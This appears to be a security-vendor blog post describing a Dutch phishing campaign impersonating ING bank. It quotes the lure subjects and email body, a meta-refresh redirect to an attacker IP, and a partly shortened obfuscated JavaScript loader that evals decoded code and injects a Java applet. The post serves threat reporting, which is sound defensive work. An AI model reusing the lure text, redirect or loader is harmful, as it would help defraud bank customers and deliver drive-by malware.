Massive email based threat targets ING users


MX Lab, http://www.mxlab.eu, started to intercept a new email based threat, based on the obfuscated Javascript technique, that targets ING users with the subjects like:

De overboeking naar uw rekening bij de ING bank is teruggestort op onze rekening.
Er is een voorschot voor uw diensten op uw rekening bij de ING bank binnengekomen.
U heeft een voorschot van 1 000,00 euro op uw rekening bij de ING bank ontvangen.
Uw rekening bij de ING bank accepteert ons voorschot niet, zie de details in de brief.
We kunnen geen geld naar uw rekening bij de ING bank overmaken omdat de bankrekeninggegevens onjuist zijn.

The email is send from the spoofed addresses and has the following body:

Geachte dames en heren,

Vorige week hebben wij uw factuurvan de belastingdienst en snel maatregelen te nemen om de
blokkering van uw rekening te voorkomen.
ontvangen en we hebben een voorschot van 1 000,00 euro voor uw diensten overgemaakt.
Helaas is de overboeking teruggekomen. Uw bank (ING bank) heeft ons meegedeeld dat de gegevens van uw bankrekening van de belastingdienst en snel maatregelen te nemen om de blokkering van uw rekening te voorkomen onjuist zijn.

Zou u daarom kunnen controleren of de gegevens juist zijn?

Hoogachtend,
ING Bank

The embedded URLs have a pattern like http://domain.tld/ing.html.

When investigating the HTML code we found a redirect to a web host:

<meta http-equiv=”refresh” content=”0;url=’hxxp://216.12.220.210/index.php?tp=4d446573c1e75ec4′”></meta>
<html><head><title>Even geduld aub…</title></head><body><a href=”http://216.12.220.210/index.php?tp=4d446573c1e75ec4″>Even geduld aub…</a></body></body></html>

This is where the malicious payload is present in a form of an obfuscated Javascript:

<html><body>
<script>
zxc=function(){
for(i=a.length-1;i!=-1;i–){
b=a.length-i-1;
b=b-Math.floor(b/c)*c;
s+=String[“fro”+h](a[i]*(1+b));
}
}
g=function(){md=”a”;
e=window[“e”+”va”+”l”];
try{b=prototype-2;}catch(w){z=2;}
s=”if(1)”;
h=”mCharCode”;
if(window.document)try{w=prototype+1;}catch(asgdshg){try{asd();}catch(gewher){
c=2;
zxc();
e(“if(1)”+s);
}}
}
a=”29.5..41..20..48..54..112..57.5..125..29.5..41..24..48..24..56..22..116..49.5..
______SHORTENED ______

a=a.split(“..”);g();
</script></body></html><script language=javascript>function StartApplet(){code = ‘1.class’;var a = document.createElement(‘applet’);a.setAttribute(‘code’, code);a.setAttribute(‘width’, 1);a.setAttribute(‘height’, 1);document.body.appendChild(a);}StartApplet();</script>

Afterwards, when the obfuscated Javascript has been executed you are being redirected to a web page with the message “501 Method Not Implemented”.

One thought on “Massive email based threat targets ING users

Comments are closed.